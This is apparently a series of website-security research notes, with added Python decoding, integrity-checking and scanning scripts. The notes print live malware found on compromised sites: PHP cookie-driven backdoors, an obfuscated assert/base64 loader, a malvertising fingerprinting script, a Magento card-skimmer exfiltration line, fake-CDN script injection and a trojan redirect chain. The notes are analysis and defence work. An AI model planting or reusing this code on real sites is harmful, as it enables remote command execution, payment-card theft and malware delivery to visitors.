Simple $_COOKIE backdoor (variation)

There are many ways to develop a backdoor, and virtually all of them share a similar goal: not to be discovered. To achieve that, some attackers are giving up on $_POST and $_GET variables, obfuscation techniques, etc., and are instead using $_COOKIE values to execute their code remotely.


The following code is a variation sample from a relatively recent malware wave (https://labs.sucuri.net/?note=2017/03/09, described by one of our researchers, Yuliyan):

<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}

As you can see, it works very similarly to other backdoors that use $_POST or $_GET variables instead of $_COOKIE. In this code, you simply need to set the “uFo” and “JmR” cookies, where the “JmR” one can be “eval” while “uFo” can be the code that you want to execute.

You can also notice the random comments between the statements, an attempt to avoid detection by the simple static signatures used by some anti-malware solutions (those comments may vary in their content and position in the code, or may not even be present). This type of injection is not limited to a particular file or directory: during our investigation, we detected several variants scattered throughout the file system.

If your website is getting reinfected very often, there might be a backdoor somewhere and we would love to clean it for you. If you need security experts to look after your website security, let us know.

Tricky malvertising injections

When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all the malware, to prevent attackers from regaining access to the resource. They may use different types of malicious code and techniques depending on their final objectives.


In this particular case, during the remediation process the client mentioned that his users were seeing some type of malvertising, but he couldn't replicate the issue. We investigated further and identified the following:

- A malicious code was injected into the theme's file:

<?php $_00022b92=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id))    {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/stat000.php ></script> ";};$_00022b92=1; ?>

- It included another file, "stat000.php":

/**/
<?php
    $dnoxemvhz = chr(97)."\x73"."s"."e"."r"."t";    // builds the string "assert"
    $bckttxtt = "b".chr(97)."\x73"."e".chr(54)."4"."\x5f"."d"."e"."\x63"."\x6f".chr(100).chr(101);    // builds the string "base64_decode"
    @$dnoxemvhz(@$bckttxtt('ZXZhbCb2tSMHhQ … long base64 string ...TTlKScpKTs='));    // assert(base64_decode(...)) evaluates the decoded payload
    ##########################################################
?>
/**/
//php_off

- When decoding the file I found that it made a request to:

$url_to="h"."t".chr(116)."\x70"."\x3a"."\x2f"."/"."\x70"."\x69"."\x63".chr(108).chr(105)."\x73"."\x74".chr(112)."\x72"."o"."\x74".chr(101).chr(99)."\x74"."\x2e"."\x6e".chr(101)."\x74"."/"."i"."\x64"."4".chr(46)."\x70"."h".chr(112);

Which decodes to “hxxp://piclistprotect.net/id4.php” (taken offline).
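The three strings above ($dnoxemvhz, $bckttxtt and $url_to) are all built the same way: a chain of short string literals, "\x" hex escapes and chr() calls glued together with PHP's "." operator, so that none of the interesting words appear in the file. The decoder below is an added example (not code from the original note or from Sucuri) that evaluates such a chain offline in Python, without ever running the PHP; it handles double- and single-quoted literals, chr() with PHP's modulo-256 wrap, and an optional leading "$name =" assignment, which is my assumption about the shapes an analyst meets most often.

```python
import re

# One token of a PHP concatenation chain: a quoted string, a chr() call,
# the "." operator, or whitespace between them.
_TOKEN_RE = re.compile(
    r'"((?:\\.|[^"\\])*)"'     # double-quoted string, escapes honoured
    r"|'((?:\\.|[^'\\])*)'"    # single-quoted string, only \' and \\ are escapes
    r"|chr\(\s*(\d+)\s*\)"     # chr(N)
    r"|(\.)"                   # concatenation operator
    r"|(\s+)"                  # whitespace
)

# Single-character escapes PHP recognises inside double quotes.
_DQ_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}


def _unescape_double_quoted(body: str) -> str:
    """Apply PHP double-quote escape rules (\\xHH and the simple escapes)."""
    out, i = [], 0
    while i < len(body):
        c = body[i]
        if c == "\\" and i + 1 < len(body):
            nxt = body[i + 1]
            if nxt == "x":
                m = re.match(r"[0-9A-Fa-f]{1,2}", body[i + 2:])
                if m:
                    out.append(chr(int(m.group(0), 16)))
                    i += 2 + len(m.group(0))
                    continue
            if nxt in _DQ_ESCAPES:
                out.append(_DQ_ESCAPES[nxt])
                i += 2
                continue
        # Unknown escape or plain character: PHP keeps it verbatim.
        out.append(c)
        i += 1
    return "".join(out)


def decode_php_concat(expr: str) -> str:
    """Evaluate a PHP expression made only of string literals, chr() and '.'."""
    expr = expr.strip().rstrip(";")
    expr = re.sub(r"^\$\w+\s*=\s*", "", expr)   # drop a leading "$name ="
    parts, pos = [], 0
    while pos < len(expr):
        m = _TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported token at offset {pos}: {expr[pos:pos + 12]!r}")
        dq, sq, chr_arg, _dot, _ws = m.groups()
        if dq is not None:
            parts.append(_unescape_double_quoted(dq))
        elif sq is not None:
            parts.append(sq.replace("\\'", "'").replace("\\\\", "\\"))
        elif chr_arg is not None:
            parts.append(chr(int(chr_arg) % 256))   # PHP's chr() wraps modulo 256
        pos = m.end()
    return "".join(parts)


if __name__ == "__main__":
    # The two function-name strings from stat000.php above.
    print(decode_php_concat(r'chr(97)."\x73"."s"."e"."r"."t"'))
    print(decode_php_concat(r'"b".chr(97)."\x73"."e".chr(54)."4"."\x5f"."d"."e"."\x63"."\x6f".chr(100).chr(101)'))
```

Anything the tokenizer does not recognise (a variable, a function other than chr(), a string operator other than ".") raises instead of guessing, so the output is either exactly what PHP would build or nothing at all.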

The remote server then responded with this final payload:

function tzSignature() {
    var tz;
    try {
        var currDate = new Date();
        var currTime = currDate.toString();
        tz = currDate.getTimezoneOffset();
        if ( (currTime.indexOf("PDT") > 0) ||
             (currTime.indexOf("MDT") > 0) ||
             (currTime.indexOf("CDT") > 0) ||
             (currTime.indexOf("EDT") > 0) ||
             (currTime.indexOf("Daylight") > 0) )
            tz += 60;
        tz = - tz / 60;
    } catch (e) {
        tz = "";
    }
    return tz;
}
function rsSignature() {
    var rs;
    try {
        var rsWidth = screen.width;
        var rsHeight = screen.height;
        var rs = rsWidth + "x" + rsHeight;
    } catch (e) {
        rs = "";
    }
    return rs;
}
var script = document.createElement("script");
script.src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();
document.head.appendChild(script);
//document.write('<sc'+'ript type="text/javascript" src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz='+i+'&rs='+rsSignature()+'"></sc'+'ript>');

- As you can see, it uses two main functions: rsSignature(), which returns the screen resolution, and tzSignature(), which returns the timezone the page viewer is in. It passes those values in the "tz" and "rs" parameters, like so: "hxxp://profixsysline.net//plix/scaner.php?id=4&tz=&rs="

Conclusion:

Attackers are constantly trying to be more efficient with their injections in order to only target certain victims. This malicious code serves specific ads to different timezones. We have been remediating lots of these types of injections lately. However, our http://sitecheck.sucuri.net/ scanner detects these types of injections and will warn you if there are any issues on your site.

Client-Side or Server-Side Script?

We’ve already described several times how credit card stealing malware hides a data collecting script behind an image URL. When people see URLs that end with .jpg, .png, or .gif they normally don’t expect them to do anything malicious. Third-party JavaScript files are much more suspicious, but it is still possible to use them in a way that coaxes webmasters into considering them benign.

When checking yet another credit card stealing JavaScript injected into the /js/ccard.js file in Magento, we noticed this line:


e294b002686cad2df01bb59e3e2299f3e:'hxxps://informaer[.]net/js/info_jquery.js',

A JS script in a malicious injection is always suspicious to us, especially when it has the word jquery in it and some unknown domain (with a typo). When we opened that URL, the only content we found there was:

jQuery.noConflict();

noConflict() is the function that tells the jQuery library to restore the original value of “$”, which lets you use other JS libraries that use “$” as a function or variable name alongside jQuery. The code is definitely benign.

But let’s check how this "informaer" URL is used by the script.

...var http=new XMLHttpRequest();http.open('POST',be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e,true);http.setRequestHeader('Content-type','application/x-www-form-urlencoded');http.send('info='+keym+'&hostname='+domm+'&key='+be20b6410993ea4c7a48767775856514b.myid);

It turns out that the URL is actually not a static JavaScript file. It’s a server-side script that receives data from filled out checkout forms passed in the info parameter of a POST request. It’s actually the collector of the stolen data. However, if you don’t use the POST method and don’t pass correct parameters, it pretends to be a benign JavaScript. It even sets the Content-Type: application/javascript; charset=utf-8 header to make it look plausible.

Hackers may go the extra mile to make their resources look benign, but as a webmaster you should never rely on what code looks like. Instead, verify whether it belongs to your site or not by answering two questions: 1. Did I put it there? If not, then 2. Is this code a part of the third-party software I installed? To answer the second question, compare it to the original third-party software (get it either directly from the developer or from your clean backup copy). If the answers to both of these questions are NO, then no matter how benign the code looks, most likely it was placed there as a result of the site compromise. Integrity control may help you easily identify such unauthorized code injections.

If malware detection and removal still sound too complex for you, Sucuri is here to help.

Titles, Imprints and Marks Left by Attackers

Some attackers seem to like signing their scripts. This is especially true for defacements and backdoors, where attackers show their pride by stating that they “owned” a site and signing their own malware. Sometimes they write their expressions and nicknames in the title or in the middle of the file:


<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file's title, we may be able to tell whether a file is malware. Most of the time, though, finding malware requires much deeper scanning, decryption and deobfuscation, which makes the task difficult and time consuming. If you don’t use such scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page, appearing 15 seconds after the visitor opens the site. Those banners are generated by the following code injected into the theme’s functions.php files:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including admin and login pages).

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain was registered only on February 11, 2017, to a Russian company, Legato LLC, and it is now hosted in Ukraine on a server with IP 78.109.28.70.

The first injected script, reconnecting-websocket.js, is a copy of the legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script, cors.js, is more interesting. After decoding it, you may notice that it has a list of banner images hosted on the imgur.com image hosting service.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, then waits for 15 seconds and loads them as banners that lead to www[.]orderrealviagra[.]cc, rotating the images on every new page load. If a user clicks on the banner, or closes it (the banners have a close [x] button), the script sets the adwords-cookie-settings cookie for the next 7 days and won’t show the banners to browsers with this cookie.

An interesting and quite rare feature of this script is that it uses the WebSocket protocol (which is why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server, wss://cloudflare[.]solutions:8085, using a custom set of commands:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon. But not on this server. A reverse IP lookup revealed only one other site on this server (ardf[.]world), which also happens to use a new generic TLD (.world). Do these sites have the same owner, or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen/bruteforced WordPress credentials) and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.
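Both this note and the Magento note earlier on the page end with the same advice: keep an integrity baseline of your site files and treat unauthorized changes as a signal. The script below is an added example (not Sucuri's tooling or code from the original notes) of the minimum that advice needs in Python: hash the tracked file types under a web root into a JSON manifest, and later diff a fresh manifest against it to list files that were added, removed or modified. The tracked extension set, the paths and the two simulated changes in demo() are constructed for the example; the theme path and the appended add_action() line mirror the functions.php injection shown above.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# File types an injection into a web root usually touches; hashing only these
# keeps the manifest small. Extend to taste (e.g. ".phtml", ".inc").
HASHED_NAMES = {".php", ".js", ".html", ".htm", ".htaccess"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map each tracked file (relative POSIX path) to its SHA-256."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix in HASHED_NAMES or path.name in HASHED_NAMES):
            manifest[path.relative_to(root).as_posix()] = sha256_file(path)
    return manifest


def save_manifest(manifest: dict[str, str], dest: Path) -> None:
    dest.write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(src: Path) -> dict[str, str]:
    return json.loads(src.read_text())


def diff_manifests(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Files that appeared, vanished, or changed since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: a clean theme, then two changes like those on this page."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "demo"
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text("<?php // clean theme functions\n")
        (theme / "style.css").write_text("body { margin: 0 }\n")  # untracked type, never reported
        baseline = build_manifest(root)
        save_manifest(baseline, root / "baseline.json")  # in practice keep this copy off the web root

        # Change 1: an extra enqueue hook appended to functions.php.
        with (theme / "functions.php").open("a") as fh:
            fh.write("add_action('wp_enqueue_scripts', 'add_js_scripts');\n")
        # Change 2: a new PHP file dropped at the web root (constructed placeholder content).
        (root / "post.php").write_text("<?php // constructed placeholder, not the page's malware\n")

        return diff_manifests(load_manifest(root / "baseline.json"), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Take the baseline right after a clean install or a verified cleanup, store it somewhere the web server cannot write to, and re-run the diff on a schedule; a theme file changing outside of a deliberate update, or a new .php file appearing at the web root, is exactly the "unauthorized change" the note above calls a strong indicator of a hack.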

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.

doc.google.com.TROJAN

During an incident response process, we identified some files located at a website’s root folder. Although they had different filenames (post.php, news.php, home.php, etc), they had the same malicious content:


<?php
// list of (compromised) sites used as the next hop in the redirect chain
$dom = array('www[.]edgefinance[.]co[.]za','www[.]capitalregioncog[.]org','contas[.]cnt[.]br','boletim[.]contas[.]cnt[.]br','www[.]capitolregionwd[.]org','bolivarcarrillo[.]udem[.]edu[.]ni','foodscience[.]keio[.]ac[.]jp','www[.]keprate[.]com','rosaliarios[.]udem[.]edu[.]ni','www[.]armd-france[.]org','luispalacios[.]udem[.]edu[.]ni','www[.]kepak[.]com','candramustika[.]unja[.]ac[.]id','appserver[.]guabiruba[.]sc[.]gov[.]br','luiscanales[.]udem[.]edu[.]ni','rawahil[.]com','avai[.]com[.]br','boletin[.]ucv[.]edu[.]pe','preview[.]table59[.]co[.]uk','jorgemendoza[.]udem[.]edu[.]ni','apps[.]timeslive[.]co[.]za','www[.]uaec[.]ufcg[.]edu[.]br','jornadasmediterraneas2014[.]atlantacongress[.]org','www[.]inmune[.]cl','www[.]dees-groep[.]nl','sporternaehrung[.]global-nutrition[.]de','www[.]afonsolopes[.]com','geomorfo[.]criba[.]edu[.]ar','wordpress[.]hockeyreno[.]com','ideation[.]attero[.]in');

// a different hop is picked on every request
$url = 'hXXp://'.$dom[mt_rand(0,sizeof($dom)-1)].'/file.php';
if (strlen($_SERVER["QUERY_STRING"])>1) {
    // a query string is present: proxy the remote file.php?aaaa response as image/jpeg
    $file=@file_get_contents($url.'?aaaa');
    header ("Content-Type: image/jpeg");
    echo $file;
} else {
    // otherwise send the browser to the chosen hop
    header('Location: '.$url);
}
exit;
?>

This kind of malicious code is very familiar to us. It is part of a malicious campaign where different sites are used as a redirect chain that’ll lead to the spam or malware page. This technique is used as an evasion method allowing the attacker to keep a fresh site (not blacklisted) at the end of the chain.

The code, when accessed, tests whether $_SERVER["QUERY_STRING"] is longer than one character, meaning that if no parameter is passed, it’ll load some image from the URL. However, if any parameter is passed to file.php, it’ll redirect the browser and proceed to download a doc.google.com file, which is a trojan expected to be executed on Windows machines. You can find more information about that trojan file here.

If you are experiencing such redirects, this could be the reason why. We highly recommend checking your site against our free scanner Sitecheck, and if you need any help identifying and cleaning it up, you can let us know.

Set your Cookie, Execute a Command

Backdoors evolve. They tend to get more complex, harder to understand and harder to decode, but this is not always the case.


Most backdoors rely on PHP engine options that allow the execution of commands, and those same options are needed by core functionality of most CMS systems out there.

The case today was different. The backdoor was so tiny that, by overlooking some of the file names on your website, you could easily miss it.

<?php if (isset($_COOKIE["i5o8vz"])) @$_COOKIE["cmd"]($_COOKIE["i5o8vz"]);

It is a really simple, yet powerful backdoor. The attacker who placed it on your website sets his cookie so he can execute the command carried in the cookie's payload, and, as we know, setting a cookie is a piece of cake. Also, $_COOKIE and $_POST variables are used as a “cloaking method”: unlike $_GET parameters, they are not logged by default in access logs, making it harder to detect anomalies when inspecting logs.
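The one-liner in this note and the commented variant in the $_COOKIE backdoor note at the top of the page share one shape: an element of a request superglobal is used as the function name and another element as its argument, optionally behind PHP's @ silencer. A literal signature for that shape is what the /*VdJR*/-style comments in the first sample are meant to break. The scanner below is an added example (not Sucuri's tooling or code from the original notes) that strips PHP comments before matching, so both samples are caught regardless of where the comments sit, while an ordinary isset()/setcookie() use of $_COOKIE is not reported. The comment regexes are deliberately not string-aware, which is my simplification for a triage heuristic rather than a PHP parser.

```python
import re
from pathlib import Path

# PHP comment forms. The samples on this page splice /*xyz*/ comments between
# tokens so a literal signature for $_COOKIE["a"]($_COOKIE["b"]) never matches;
# removing comments first defeats that. Strings containing "//" or "#" are not
# lexed specially here (acceptable for triage, not for a full parser).
_COMMENT_RE = re.compile(
    r"/\*.*?\*/"      # /* ... */ block comments
    r"|//[^\n]*"      # // line comments
    r"|#[^\n]*",      # # line comments
    re.DOTALL,
)

# An element of a request superglobal, e.g. $_COOKIE["cmd"] or $_POST['x'].
_SUPERGLOBAL = r"\$_(?:COOKIE|POST|GET|REQUEST)\s*\[[^\]]*\]"

# The backdoor shape: a superglobal element used as the *function* and another
# superglobal element as its *argument*, optionally behind PHP's @ silencer.
_VAR_FUNC_RE = re.compile(
    r"@?\s*(" + _SUPERGLOBAL + r")\s*\(\s*@?\s*(" + _SUPERGLOBAL + r")\s*\)"
)


def strip_php_comments(src: str) -> str:
    """Replace every comment with a space so neighbouring tokens stay apart."""
    return _COMMENT_RE.sub(" ", src)


def find_variable_function_calls(src: str) -> list[tuple[str, str]]:
    """Return (callee, argument) pairs for superglobal-as-function calls."""
    cleaned = strip_php_comments(src)
    return [(m.group(1), m.group(2)) for m in _VAR_FUNC_RE.finditer(cleaned)]


def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Scan every .php file under root; return only the files with findings."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue   # unreadable file: skip rather than abort the whole scan
        hits = find_variable_function_calls(src)
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for callee, arg in hits:
            print(f"{path}: {callee}({arg})")
```

Run it against the whole document root, not just the theme or plugin folders, since the first note reports variants scattered throughout the file system. File-level detection matters here precisely because the cookie values never reach a default access log; if you also want them in Apache logs, the %{Cookie}i directive in a LogFormat records the request header.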

If you notice some suspicious activity on your website, or it is sending SPAM on its own, or even if you have been blacklisted by the major search engines, you can rely on us to clean and protect your website.